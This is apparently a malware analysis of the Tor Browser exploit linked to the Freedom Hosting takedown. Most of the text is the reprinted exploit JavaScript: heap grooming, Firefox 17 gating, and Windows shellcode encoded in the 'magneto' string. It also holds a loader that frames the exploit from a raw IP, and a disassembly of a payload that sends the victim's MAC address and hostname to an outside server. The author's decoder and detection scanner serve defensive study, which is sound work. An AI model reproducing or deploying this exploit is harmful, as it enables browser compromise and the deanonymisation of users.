that anyone knocking down your door will find nothing on your computers.
Original code
Below is the original JavaScript code from the Tor attack that was likely related to the Freedom Hosting takedown. The payload for the malware, a Windows .exe executable, is obfuscated and hidden in the magneto variable as a long string of \uXXXX escapes. A disassembly of the executable is located below.
Note: If you find the code hard to follow, don’t worry – it was coded that way on purpose. Comments in the code were added by me.
nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframe frameborder="0" border="0" height="1" width="1" id="iframe"></iframe>
</body>
</html>
<script>
var var1 = 0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5 = 0xFF004;
var var6 = 0x3FC01;
var var7 = 0x60000000;
var var8 = 0x18000000;
var var9 = 1;
var var10 = 0x12000000;
var var11 = 0;
var var12 = 0;
var var13 = 0;
// Called from content_2.html / content_3.html through parent.df(); returns 0
// unless b() accepted the browser version.
function df() {
  if (var12 == 0) {
    return 0x00000000;
  }
  var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
  if (var9 == 1 || var9 == 2)
    return (var14 - var12);
  else
    return 0x00000000;
}
// Version gate: only Firefox 17 on Windows (see al()) gets var12 set; older
// or non-matching browsers are redirected to content_1.html.
function b() {
  var version = al();
  if (version < 17) {
    window.location.href = "content_1.html";
  }
  if (version >= 17 && version < 18)
    var12 = 0xE8;
  return;
}
function c() {
  var iframe = document.getElementById("iframe");
  // The code for content_1.html is located below. It basically builds the
  // iframe to house content_2.html
  iframe.src = "content_2.html";
}
// Allocates many ArrayBuffer / Int32Array objects and plain arrays filled with
// marker values (heap grooming) so later code can recognise them by content.
function d() {
  for (var j = 0; j < var1; j++) {
    if (j < var1 / 8 || j == var1 - 1) {
      var tabb = new Array(0x1ED00);
      var4[j] = tabb;
      for (i = 0; i < 0x1ED00; i++) {
        var4[j][i] = 0x11559944;
      }
    }
    var2[j] = new ArrayBuffer(var5);
  }
  for (var j = 0; j < var1; j++) {
    var3[j] = new Int32Array(var2[j], 0, var6);
    var3[j][0] = 0x11336688;
    for (var i = 1; i < 16; i++) {
      var3[j][0x4000 * i] = 0x11446688;
    }
  }
  for (var j = 0; j < var1; j++) {
    if (typeof var4[j] != "undefined") {
      var4[j][0] = 0x22556611;
    }
  }
}
function e(view) {
  var i = 0;
  for (i = 0; i < 0x400; i++) {
    view[i] = var13 + 0x1010;
  }
  view[0x0] = var13 + 0x1010;
  view[0x44] = 0x0;
  view[0x45] = 0x0;
  view[0x400 - 4] = var13 + 0x1010;
  view[0x400] = 0x00004004;
  view[0x401] = 0x7FFE0300;
}
// The magneto variable contains the payload – a Windows .exe designed to capture
// the user’s MAC address and machine hostname. It has been disassembled below.
function f(var15, view, var16) {
  var magneto = "";
  var magneto = ("\ufc60\u8ae8" + "\u0000\u6000" + "\ue589\ud231" + "\u8b64\u3052" + "\u528b\u8b0c" + "\u1452\u728b" + "\u0f28\u4ab7" + "\u3126\u31ff" + "\uacc0\u613c" + "\u027c\u202c" + "\ucfc1\u010d" + "\ue2c7\u52f0" + "\u8b57\u1052" + "\u428b\u013c" + "\u8bd0\u7840" + "\uc085\u4a74" + "\ud001\u8b50" + "\u1848\u588b" + "\u0120\ue3d3" + "\u493c\u348b" + "\u018b\u31d6" + "\u31ff\uacc0" + "\ucfc1\u010d" + "\u38c7\u75e0" + "\u03f4\uf87d" + "\u7d3b\u7524" + "\u58e2\u588b" + "\u0124\u66d3" + "\u0c8b\u8b4b" + "\u1c58\ud301" + "\u048b\u018b" + "\u89d0\u2444" + "\u5b24\u615b" + "\u5a59\uff51" + "\u58e0\u5a5f" + "\u128b\u86eb" + "\u5d05\ubd81" + "\u02e9\u0000" + "\u4547\u2054" + "\u7075\u858d" + "\u02d1\u0000" + "\u6850\u774c" + "\u0726\ud5ff" + "\uc085\u5e74" + "\u858d\u02d8" + "\u0000\u6850" + "\u774c\u0726" + "\ud5ff\uc085" + "\u4c74\u90bb" + "\u0001\u2900" + "\u54dc\u6853" + "\u8029\u006b" + "\ud5ff\udc01" + "\uc085\u3675" + "\u5050\u5050" + "\u5040\u5040" + "\uea68\udf0f" + "\uffe0\u31d5" + "\uf7db\u39d3" + "\u74c3\u891f" + "\u6ac3\u8d10" + "\ue1b5\u0002" + "\u5600\u6853" + "\ua599\u6174" + "\ud5ff\uc085" + "\u1f74\u8dfe" + "\u0089\u0000" + "\ue375\ubd80" + "\u024f\u0000" + "\u7401\ue807" + "\u013b\u0000" + "\u05eb\u4de8" + "\u0001\uff00" + "\ub8e7\u0100" + "\u0000\uc429" + "\ue289\u5052" + "\u6852\u49b6" + "\u01de\ud5ff" + "\u815f\u00c4" + "\u0001\u8500" + "\u0fc0\uf285" + "\u0000\u5700" + "\uf9e8\u0000" + "\u5e00\uca89" + "\ubd8d\u02e9" + "\u0000\uebe8" + "\u0000\u4f00" + "\ufa83\u7c20" + "\uba05\u0020" + "\u0000\ud189" + "\uf356\ub9a4" + "\u000d\u0000" + "\ub58d\u02c4" + "\u0000\ua4f3" + "\ubd89\u024b" + "\u0000\u565e" + "\ua968\u3428" + "\uff80\u85d5" + "\u0fc0\uaa84" + "\u0000\u6600" + "\u488b\u660a" + "\uf983\u0f04" + "\u9c82\u0000" + "\u8d00\u0c40" + "\u008b\u088b" + "\u098b\u00b8" + "\u0001\u5000" + "\ue789\uc429" + "\ue689\u5657" + "\u5151\u4868" + "\ud272\uffb8" + "\u85d5\u81c0" + "\u04c4\u0001" + "\u0f00\u0fb7" + "\uf983\u7206" + "\ub96c\u0006" +
    "\u0000\u10b8" + "\u0000\u2900" + "\u89c4\u89e7" + "\ud1ca\u50e2" + "\u3152\u8ad2" + "\u8816\u24d0" + "\uc0f0\u04e8" + "\u093c\u0477" + "\u3004\u02eb" + "\u3704\u0788" + "\u8847\u24d0" + "\u3c0f\u7709" + "\u0404\ueb30" + "\u0402\u8837" + "\u4707\ue246" + "\u59d4\ucf29" + "\ufe89\u0158" + "\u8bc4\u4bbd" + "\u0002\uf300" + "\uc6a4\u4f85" + "\u0002\u0100" + "\u2ee8\u0000" + "\u3100\u50c0" + "\u2951\u4fcf" + "\u5357\uc268" + "\u38eb\uff5f" + "\u53d5\u7568" + "\u4d6e\uff61" + "\ue9d5\ufec8" + "\uffff\uc931" + "\ud1f7\uc031" + "\uaef2\ud1f7" + "\uc349\u0000" + "\u0000\u8d00" + "\ue9bd\u0002" + "\ue800\uffe4" + "\uffff\ub94f" + "\u004f\u0000" + "\ub58d\u0275" + "\u0000\ua4f3" + "\ubd8d\u02e9" + "\u0000\ucbe8" + "\uffff\uc3ff" + "\u0a0d\u6f43" + "\u6e6e\u6365" + "\u6974\u6e6f" + "\u203a\u656b" + "\u7065\u612d" + "\u696c\u6576" + "\u0a0d\u6341" + "\u6563\u7470" + "\u203a\u2f2a" + "\u0d2a\u410a" + "\u6363\u7065" + "\u2d74\u6e45" + "\u6f63\u6964" + "\u676e\u203a" + "\u7a67\u7069" + "\u0a0d\u0a0d" + "\u8300\u0ec7" + "\uc931\ud1f7" + "\uc031\uaef3" + "\uff4f\u0de7" + "\u430a\u6f6f" + "\u696b\u3a65" + "\u4920\u3d44" + "\u7377\u5f32" + "\u3233\u4900" + "\u4850\u504c" + "\u5041\u0049" + "\u0002\u5000" + "\ude41\u36ca" + "\u4547\u2054" + "\u312f\u3866" + "\u6134\u3165" + "\u2d64\u6230" + "\u3531\u342d" + "\u6434\u2d63" + "\u3939\u3336" + "\u382d\u6362" + "\u3739\u3131" + "\u3430\u3935" + "\u2030\u5448" + "\u5054\u312f" + "\u312e\u0a0d" + "\u6f48\u7473" + "\u203a\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" +
    "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u0000" + "\u0000\u9000" + "");
  var var29 = magneto;
  // Small x86 stubs (encoded as UTF-16 code units) that save and restore the
  // registers and the stack pointer around the payload.
  var var17 = "\u9060";
  var var18 = "\u9061";
  var var19 = "\uC481\u0000\u0008";
  var var20 = "\u2589\u3000" + String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  var var21 = "\u258B\u3000" + String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  var var22 = "\uE589";
  var var23 = "\uC3C9";
  var var24 = "\uE889";
  var24 += "\u608D\u90C0";
  var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
  var var26 = var25 + var16 * 4;
  var var27 = "";
  var27 += "\uB890\u2020\u2020";
  var27 += "\uA390" + ae(var26 + 0x00);
  var27 += "\uA390" + ae(var26 + 0x04);
  var27 += "\uA390" + ae(var26 + 0x08);
  var27 += "\uA390" + ae(var26 + 0x0C);
  // Concatenate the stubs around the payload, then convert to int32 words.
  var var28 = var17;
  var28 += var20;
  var28 += var19;
  var28 += var22;
  var28 += var27;
  var28 += var29;
  var28 += var21;
  var28 += var18;
  var28 += var23;
  var var29Array = new Array();
  var29Array = ag(var28);
  var var29Ad = var13 + 0x5010;
  var i = 0;
  var j = 0;
  var var30 = var13 + 0x4048;
  var var31 = new Array();
  var31[0] = var30;
  var31[1] = var30;
  var31[2] = var30;
  var31[3] = var15[1];
  var31[4] = var29Ad;
  var31[5] = 0xFFFFFFFF;
  var31[6] = var13 + 0x4044;
  var31[7] = var13 + 0x4040;
  var31[8] = 0x00000040;
  var31[9] = var13 + 0x4048;
  var31[10] = 0x00040000;
  var31[11] = var29Ad;
  var31[12] = var13 + 0x301C;
  for (var i = 0 ; i < 0x140 ; i++) {
    var31[i + 15] = var15[0];
  }
  var var32 = 0x3F8;
  view[0x800 + 0 + var32] = var13 + 0x4018;
  view[0x800 + 1 + var32] = var13 + 0x4018;
  for (var i = 2 ; i < var31.length ; i++) {
    view[0x800 + i + var32] = 0x41414141;
  }
  for (var i = 0 ; i < var31.length ; i++) {
    view[0xC02 + i + var32] = var31[i];
  }
  for (var i = 0 ; i < var29Array.length ; i++) {
    view[0x1000 + i + var32] = var29Array[i];
  }
}
function g(var50, view) {
  var k = h(var50, view);
  var j = 0;
  if (k < 0)
    return -1;
  view[0x404 + k] = var13 + 0x3010;
  return 1;
}
function h(var50, view) {
  var address = 0;
  var u = 0;
  var memory = "";
  var var55 = 0;
  for (u = 7; u >= 4 ; u--) {
    address = view[0x404 + u];
    if (address > 0x000A0000 && address < 0x80000000) {
      memory = i(address, 0x48, var50, view);
      var55 = af(memory[0x14] + memory[0x15]);
      if (var55 == address) {
        return u;
      }
    }
  }
  return -1;
}
function i(address, size, var50, view) {
  var var56 = size / 2;
  var56 = var56 * 0x10 + 0x04;
  view[0x400] = var56;
  view[0x401] = address;
  return var4[var50][0];
}
function j(memory, view) {
  var intArray = ag(memory);
  for (var i = 0 ; i < intArray.length ; i++) {
    view[0x404 + i] = intArray[i];
  }
}
function k() {
  for (var j = 0; j < var1; j++) {
    if (var2[j].byteLength != var5) {
      return j;
    }
  }
  return -1;
}
function l(view, var58) {
  view[var58] = var13 + 0x1030;
  view[var58 + 1] = 0xFFFFFF85;
}
function m(view, var58) {
  view[var58] = 0x00000000;
  for (var j = 0; j < var1; j++) {
    if (typeof var4[j] != "undefined") {
      if (var4[j][0] != 0x22556611)
        return j;
    }
  }
  return -1;
}
function n(view, firstvar58) {
  var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  var var58 = 0;
  for (var i = 0; i < 200; i++) {
    if (view[var58] != 0x11336688) {
      if (view[var58] == 0x22556611)
        return var58;
      else
        return -1;
    }
    if (var58 == 0) {
      var58 = firstvar58;
    } else {
      var var59 = view[var58 - 0x0C];
      var58 = (var59 - var57) / 4;
    }
  }
  return -1;
}
function o(var60) {
  var view = new Int32Array(var2[var60], 0, 0x00040400);
  var var59 = view[0x00100000 / 4 - 0x0C];
  var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  return ((var59 - var57) / 4);
}
function p() {
  for (var j = 0; j < var1; j++) {
    for (var i = 1; i < 16; i++) {
      if (var3[j][i * 0x4000 - 0x02] == 0x01000000) {
        return -i;
      }
    }
  }
  return 0;
}
function q(var60) {
  var view = new Int32Array(var2[var60], 0, 0x00040400);
  view[0x00100000 / 4 - 0x02] = var7;
  if (var2[var60 + 1].byteLength == var7)
    return var60 + 1;
  return -1;
}
function r(var60) {
  var view = new Int32Array(var2[var60], 0, 0x00040400);
  view[0x00100000 / 4 - 0x02] = var5;
}
// sessionStorage flag: run the exploit only once per browsing session.
function t() {
  if (typeof sessionStorage.tempStor != "undefined")
    return false;
  sessionStorage.tempStor = "";
  return true;
}
function u() {
  if (t() == true) {
    var9 = 1;
    b();
    d();
    c();
  } else {
    return;
  }
}
function v() {
  if (k() == -1) {
    var11 = p();
    var9 = 2;
    c();
  } else {
    x();
  }
}
function w() {
  if (var9 == 1)
    v();
  else
    x();
}
function x() {
  var var60 = k();
  if (var60 == -1)
    return;
  var nextvar60 = q(var60);
  if (nextvar60 == -1)
    return;
  var var61 = o(var60);
  var var62 = new Int32Array(var2[nextvar60], 0, var8);
  var var58 = n(var62, var61);
  if (var58 == -1)
    return;
  var var50 = m(var62, var58);
  var13 = var10 + 0x00100000 + 0x00010000 * var11;
  e(var62);
  l(var62, var58);
  var var64 = var4[var50][0];
  ac(var64, var50, var62, var58, var60);
}
function y(index) {
  var4[index][1] = document.createElement('span');
}
function z(index, index2) {
  var4[index][1].innerHTML;
}
function aa(view, var63) {
  return view[var63];
}
function ab(address, view, var63) {
  view[var63] = address;
}
function ac(var64, var50, var62, var58, var60) {
  var var15 = ah(var64);
  f(var15, var62, var58);
  y(var50);
  var var66 = aa(var62, var58 + 2);
  var var67 = i(var66, 0x40, var50, var62);
  j(var67, var62);
  g(var50, var62);
  ab(var13 + 0x1040, var62, var58 + 2);
  r(var60);
  setTimeout(ad, 1000);
  z(var50);
}
// Cleanup: release the sprayed arrays one second after the payload is placed.
function ad() {
  for (var j = 0; j < var1; j++) {
    delete var3[j];
    var3[j] = null;
    delete var2[j];
    var2[j] = null;
    if (typeof var4[j] != "undefined") {
      delete var4[j];
      var4[j] = null;
    }
  }
  delete var2;
  delete var3;
  delete var4;
  var2 = null;
  var3 = null;
  var4 = null;
}
// ae/af/ag convert between 32-bit integers and pairs of UTF-16 code units
// (low 16 bits first); ag() pads odd-length strings with a "\u9090" (two NOPs).
function ae(int32) {
  var var68 = String.fromCharCode((int32) & 0x0000FFFF);
  var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
  return var68 + var69;
}
function af(string) {
  var var70 = string.charCodeAt(0);
  var var71 = string.charCodeAt(1);
  var var72 = (var71 << 16) + var70;
  return var72;
}
function ag(string) {
  if (string.length % 2 != 0)
    string += "\u9090";
  var intArray = new Array();
  for (var i = 0 ; i * 2 < string.length; i++)
    intArray[i] = af(string[i * 2] + string[i * 2 + 1]);
  return intArray;
}
function ah(var73) {
  var var74 = var73.substring(0, 2);
  var var70 = var74.charCodeAt(0);
  var var71 = var74.charCodeAt(1);
  var var75 = (var71 << 16) + var70;
  if (var75 == 0) {
    var var76 = var73.substring(32, 34);
    var var70 = var76.charCodeAt(0);
    var var71 = var76.charCodeAt(1);
    var75 = (var71 << 16) + var70;
  }
  var var15 = am(var75);
  if (var15 == -1) {
    return;
  }
  return var15;
}
// Browser fingerprinting: require "Windows NT" in the User-Agent ...
function aj(version) {
  var i = navigator.userAgent.indexOf("Windows NT");
  if (i != -1)
    return true;
  return false;
}
// ... and parse the major version out of the trailing "Firefox/NN.N" token.
function ak() {
  var ua = navigator.userAgent;
  var browser = ua.substring(0, ua.lastIndexOf("/"));
  browser = browser.substring(browser.lastIndexOf(" ") + 1);
  if (browser != "Firefox")
    return -1;
  var version = ua.substring(ua.lastIndexOf("/") + 1);
  version = parseInt(version.substring(0, version.lastIndexOf(".")));
  return version;
}
function al() {
  version = ak();
  if (!aj(version))
    return -1;
  return version;
}
// Lookup table keyed by the low 16 bits of a leaked pointer: each branch
// corresponds to a different Firefox build and yields two addresses for it.
function am(var77) {
  var var15 = new Array(2);
  if (var77 % 0x10000 == 0xE510) {
    var78 = var77 - 0xE510;
    var15[0] = var78 + 0xE8AE;
    var15[1] = var78 + 0xD6EE;
  }
  else if (var77 % 0x10000 == 0x9A90) {
    var78 = var77 - 0x69A90;
    var15[0] = var78 + 0x6A063;
    var15[1] = var78 + 0x68968;
  }
  else if (var77 % 0x10000 == 0x5E70) {
    var78 = var77 - 0x65E70;
    var15[0] = var78 + 0x66413;
    var15[1] = var78 + 0x64D34;
  }
  else if (var77 % 0x10000 == 0x35F3) {
    var78 = var77 - 0x335F3;
    var15[0] = var78 + 0x4DE13;
    var15[1] = var78 + 0x49AB8;
  }
  else if (var77 % 0x10000 == 0x5CA0) {
    var78 = var77 - 0x65CA0;
    var15[0] = var78 + 0x66253;
    var15[1] = var78 + 0x64B84;
  }
  else if (var77 % 0x10000 == 0x5CD0) {
    var78 = var77 - 0x65CD0;
    var15[0] = var78 + 0x662A3;
    var15[1] = var78 + 0x64BA4;
  }
  else if (var77 % 0x10000 == 0x6190) {
    var78 = var77 - 0x46190;
    var15[0] = var78 + 0x467D3;
    var15[1] = var78 + 0x45000;
  }
  else if (var77 % 0x10000 == 0x9CB9) {
    var78 = var77 - 0x29CB9;
    var15[0] = var78 + 0x29B83;
    var15[1] = var78 + 0xFFC8;
  }
  else if (var77 % 0x10000 == 0x9CE9) {
    var78 = var77 - 0x29CE9;
    var15[0] = var78 + 0x29BB3;
    var15[1] = var78 + 0xFFD8;
  }
  else if (var77 % 0x10000 == 0x70B0) {
    var78 = var77 - 0x470B0;
    var15[0] = var78 + 0x47733;
    var15[1] = var78 + 0x45F18;
  }
  else if (var77 % 0x10000 == 0x7090) {
    var78 = var77 - 0x47090;
    var15[0] = var78 + 0x476B3;
    var15[1] = var78 + 0x45F18;
  }
  else if (var77 % 0x10000 == 0x9E49) {
    var78 = var77 - 0x29E49;
    var15[0] = var78 + 0x29D13;
    var15[1] = var78 + 0x10028;
  }
  else if (var77 % 0x10000 == 0x9E69) {
    var78 = var77 - 0x29E69;
    var15[0] = var78 + 0x29D33;
    var15[1] = var78 + 0x10018;
  }
  else if (var77 % 0x10000 == 0x9EB9) {
    var78 = var77 - 0x29EB9;
    var15[0] = var78 + 0x29D83;
    var15[1] = var78 + 0xFFC8;
  }
  else {
    return -1;
  }
  return var15;
}
// Note: u() is invoked immediately here rather than registered as a handler
// ("onload" is also not the event name addEventListener expects; "load" is).
window.addEventListener("onload", u(), true);
</script>
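Added example (my code, not code from the page or from whoever wrote the exploit): a small decoder for the encoding the magneto string uses. Each JavaScript UTF-16 code unit carries two payload bytes, low byte first, which is why the page's af() builds one int32 from two consecutive code units. Pulling printable strings out of the decoded bytes is the first thing an analyst does with such a blob, and it already exposes the HTTP headers the payload sends. The sample string is the header fragment taken from near the end of the page's own magneto blob (a fragment only, not the whole payload); the function names are mine.

```javascript
// Added example: decode the \uXXXX string encoding used by the magneto variable
// and run a minimal `strings` over the result. Not part of the original page.

// Sample: the HTTP-header fragment from the page's own magneto string
// ("\r\nConnection: keep-alive\r\nAccept: */*\r"). Fragment only.
const SAMPLE = "\u0a0d\u6f43\u6e6e\u6365\u6974\u6e6f\u203a\u656b\u7065\u612d\u696c\u6576"
             + "\u0a0d\u6341\u6563\u7470\u203a\u2f2a\u0d2a";

// Each code unit holds two payload bytes, low byte first (little-endian).
function decodeUnicodeBlob(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const cu = str.charCodeAt(i);
    out[2 * i] = cu & 0xff;
    out[2 * i + 1] = (cu >> 8) & 0xff;
  }
  return out;
}

// Same arithmetic as the page's af(), but kept unsigned: two code units -> one int32.
function codeUnitsToInt32(pair) {
  return ((pair.charCodeAt(1) << 16) | pair.charCodeAt(0)) >>> 0;
}

// Read a little-endian uint32 from the decoded bytes, to confirm the byte order.
function readUint32LE(bytes, offset) {
  return (bytes[offset] | (bytes[offset + 1] << 8) |
          (bytes[offset + 2] << 16) | (bytes[offset + 3] << 24)) >>> 0;
}

// Minimal `strings`: runs of printable ASCII at least minLen bytes long.
function extractAsciiStrings(bytes, minLen = 4) {
  const found = [];
  let run = "";
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) {
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) found.push(run);
      run = "";
    }
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Prints ["Connection: keep-alive", "Accept: */*"] for SAMPLE.
console.log(extractAsciiStrings(decodeUnicodeBlob(SAMPLE)));
```

Run over the full magneto string the same function recovers the DLL names, the request line and the cookie prefix that the disassembly below annotates, before any instruction has been decoded.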
nl7qbezu7pqsuone.onion/content_2.html:
<html>
<body>
</body>
</html>
<script>
// content_2.html: on the first load (URL without the marker) it nests
// content_3.html; when reloaded with the marker appended it calls w() in the
// top frame to continue the exploit.
var y = "?????", url = window.location.href;
if (0 > url.indexOf(y)) {
  var iframe = document.createElement("iframe");
  iframe.src = "content_3.html";
  document.body.appendChild(iframe);
} else {
  parent.w();
}
function df() { return parent.df(); }
</script>
nl7qbezu7pqsuone.onion/content_3.html:
<script>
// content_3.html: once df() returns a non-zero value it stops the load, sprays
// 1024 small Int32Arrays carrying that value, and rewrites the parent frame's
// document so that it navigates back to content_2.html with the marker appended.
var y = "?????", z = "";
z = z + "<body";
z = z + ">";
z = z + "<img";
z = z + " height='1' width='1' src='error.html'";
z = z + ' onerror="javascript: ';
z = z + ("window.location.href='content_2.html" + y + "';\" ");
z = z + ">";
z = z + "</body";
z = z + ">";
var flag = !1, var83 = 0;
function b() {
  for (var e = Array(1024), d = Array(1024), c = 0; 1024 > c; c++)
    e[c] = new ArrayBuffer(180);
  for (c = 0; 1024 > c; c++)
    d[c] = new Int32Array(e[c], 0, 45), d[c][9] = var83;
  return d;
}
function a() {
  !1 == flag && (flag = !0, window.stop());
  window.stop();
  b();
  window.parent.frames[0].frameElement.ownerDocument.write(z);
  b();
}
var83 = parent.df();
0 != var83 && document.addEventListener("readystatechange", a, !1);
</script>
And then we have this little beauty, the loader: it checks for Firefox, drops a 30-minute n_serv cookie so it runs once, and appends an iframe that pulls the exploit page from 65.222.202.53 over plain HTTP:
function createCookie(name, value, minutes) {
  if (minutes) {
    var date = new Date();
    date.setTime(date.getTime() + (minutes * 60 * 1000));
    var expires = "; expires=" + date.toGMTString();
  }
  else var expires = "";
  document.cookie = name + "=" + value + expires + "; path=/";
}
function readCookie(name) {
  var nameEQ = name + "=";
  var ca = document.cookie.split(';');
  for (var i = 0; i < ca.length; i++) {
    var c = ca[i];
    while (c.charAt(0) == ' ') c = c.substring(1, c.length);
    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  }
  return null;
}
// Firefox detection via Gecko-only properties and the User-Agent string.
function isFF() {
  return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
// Inserts the iframe that loads the exploit page from the clearnet server.
function updatify() {
  var iframe = document.createElement('iframe');
  iframe.style.display = "inline";
  iframe.frameBorder = "0";
  iframe.scrolling = "no";
  iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
  iframe.height = "5";
  iframe.width = "*";
  document.body.appendChild(iframe);
}
// The n_serv cookie (30 minutes) keeps the iframe from being inserted again.
function freedomhost() {
  if (!readCookie("n_serv")) {
    createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
    updatify();
  }
}
function isReady() {
  if (document.readyState === "interactive" || document.readyState === "complete") {
    if (isFF()) {
      //window.alert(window.location + "Firefox Detected.")
      freedomhost();
    }
  }
  else {
    setTimeout(isReady, 250);
  }
}
setTimeout(isReady, 250);
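Added example (my code, not part of the page): a heuristic scanner for the idioms visible in the three scripts above, run over constructed snippets. It flags user-agent gating on Firefox or Windows, a tiny iframe, an iframe whose src is a raw clearnet IP, long runs of \u escapes in string literals, and ArrayBuffer/Int32Array allocation inside a loop. The rule names and thresholds are my choices, and the sample snippets are constructed (the loader sample uses the documentation address 192.0.2.10 rather than the page's real IPs; the spray sample reuses the constants from the page's d()). It is a triage aid for page content pulled from a proxy or a crawl, not a substitute for blocking script execution.

```javascript
// Added example: heuristic static scan of page scripts for the exploit-kit
// idioms seen on this page. Not part of the original page; thresholds are mine.

// Any height/width assignment of 5 or less (the page used height 1 and 5).
function hasTinyDimension(src) {
  const re = /\b(?:height|width)\s*=\s*["']?(\d+)["']?/gi;
  let m;
  while ((m = re.exec(src)) !== null) {
    if (parseInt(m[1], 10) <= 5) return true;
  }
  return false;
}

const RULES = [
  { name: "ua-fingerprint",
    test: s => /navigator\.userAgent/.test(s) && /Firefox|Windows NT/.test(s) },
  { name: "clearnet-ip-iframe",
    test: s => /iframe/i.test(s) && /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}/.test(s) },
  { name: "tiny-iframe",
    test: s => /iframe/i.test(s) && hasTinyDimension(s) },
  { name: "unicode-escape-blob",          // 64+ \uXXXX escapes in one script
    test: s => (s.match(/\\u[0-9a-fA-F]{4}/g) || []).length >= 64 },
  { name: "typed-array-spray",            // ArrayBuffer + Int32Array in a loop
    test: s => /for\s*\(/.test(s) && /new\s+ArrayBuffer\s*\(/.test(s) &&
               /new\s+Int32Array\s*\(/.test(s) },
];

// Returns the sorted list of rule names that fire on a script body.
function scanScript(src) {
  return RULES.filter(r => r.test(src)).map(r => r.name).sort();
}

// Constructed samples (not taken from the page).
const BENIGN = [
  'var f = document.createElement("iframe");',
  'f.src = "https://www.example.com/embed/video";',
  'f.width = "640"; f.height = "360";',
  'document.body.appendChild(f);',
].join("\n");

const LOADER = [   // shaped like the cookie/iframe loader above
  'if (/Firefox/i.test(navigator.userAgent)) {',
  '  var f = document.createElement("iframe");',
  '  f.frameBorder = "0";',
  '  f.src = "http://192.0.2.10/?requestID=00000000-0000-4000-8000-000000000000";',
  '  f.height = "5"; f.width = "*";',
  '  document.body.appendChild(f);',
  '}',
].join("\n");

const SPRAY = [    // shaped like d() and the magneto string above
  'var bufs = new Array(0xB0), views = new Array(0xB0);',
  'for (var j = 0; j < 0xB0; j++) {',
  '  bufs[j] = new ArrayBuffer(0xFF004);',
  '  views[j] = new Int32Array(bufs[j], 0, 0x3FC01);',
  '}',
  'var blob = "' + "\\u9090".repeat(80) + '";',
].join("\n");

console.log("benign:", scanScript(BENIGN));   // []
console.log("loader:", scanScript(LOADER));   // clearnet-ip-iframe, tiny-iframe, ua-fingerprint
console.log("spray:", scanScript(SPRAY));     // typed-array-spray, unicode-escape-blob
```

A single hit (a small iframe, say) is common on ordinary pages; it is the combination, especially user-agent gating next to an iframe pointing at a bare IP, that is worth a human look.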
A lightly annotated disassembly of the obfuscated Windows .exe payload (which can be found in the magneto variable in the JavaScript code) is included below. The payload looks up the victim’s MAC address and machine hostname and sends them in an HTTP request to the server at 65.222.202.54, over a socket it opens itself rather than through Tor.
Payload disassembly
00000000 skipping 0x91 bytes
00000091 5D pop ebp
00000092 81BDE902000047455420 cmp dword [ebp+0x2e9],0x20544547 # "GET "
0000009C 7570 jnz 0x10e
0000009E 8D85D1020000 lea eax,[ebp+0x2d1] # "ws2_32"
000000A4 50 push eax
000000A5 684C772607 push dword 0x726774c # LoadLibraryA
000000AA FFD5 call ebp
000000AC 85C0 test eax,eax
000000AE 745E jz 0x10e
000000B0 8D85D8020000 lea eax,[ebp+0x2d8] # "IPHLPAPI"
000000B6 50 push eax
000000B7 684C772607 push dword 0x726774c # LoadLibraryA
000000BC FFD5 call ebp # ebp = find function
000000BE 85C0 test eax,eax
000000C0 744C jz 0x10e
000000C2 BB90010000 mov ebx,0x190
000000C7 29DC sub esp,ebx
000000C9 54 push esp
000000CA 53 push ebx
000000CB 6829806B00 push dword 0x6b8029 # WSAStartupA
000000D0 FFD5 call ebp
000000D2 01DC add esp,ebx
000000D4 85C0 test eax,eax
000000D6 7536 jnz 0x10e
000000D8 50 push eax
000000D9 50 push eax
000000DA 50 push eax
000000DB 50 push eax
000000DC 40 inc eax
000000DD 50 push eax
000000DE 40 inc eax
000000DF 50 push eax
000000E0 68EA0FDFE0 push dword 0xe0df0fea # WSASocketA
000000E5 FFD5 call ebp
000000E7 31DB xor ebx,ebx
000000E9 F7D3 not ebx
000000EB 39C3 cmp ebx,eax
000000ED 741F jz 0x10e
000000EF 89C3 mov ebx,eax
000000F1 6A10 push byte +0x10
000000F3 8DB5E1020000 lea esi,[ebp+0x2e1] # struct sockaddr_in { AF_INET, 80, 65.222.202.54 }
000000F9 56 push esi
000000FA 53 push ebx
000000FB 6899A57461 push dword 0x6174a599 # connect
00000100 FFD5 call ebp
00000102 85C0 test eax,eax
00000104 741F jz 0x125
00000106 FE8D89000000 dec byte [ebp+0x89] # Try to connect 5 times
0000010C 75E3 jnz 0xf1
0000010E 80BD4F02000001 cmp byte [ebp+0x24f],0x1
00000115 7407 jz 0x11e
00000117 E83B010000 call 0x257
0000011C EB05 jmp short 0x123
0000011E E84D010000 call 0x270
00000123 FFE7 jmp edi
00000125 B800010000 mov eax,0x100
0000012A 29C4 sub esp,eax
0000012C 89E2 mov edx,esp
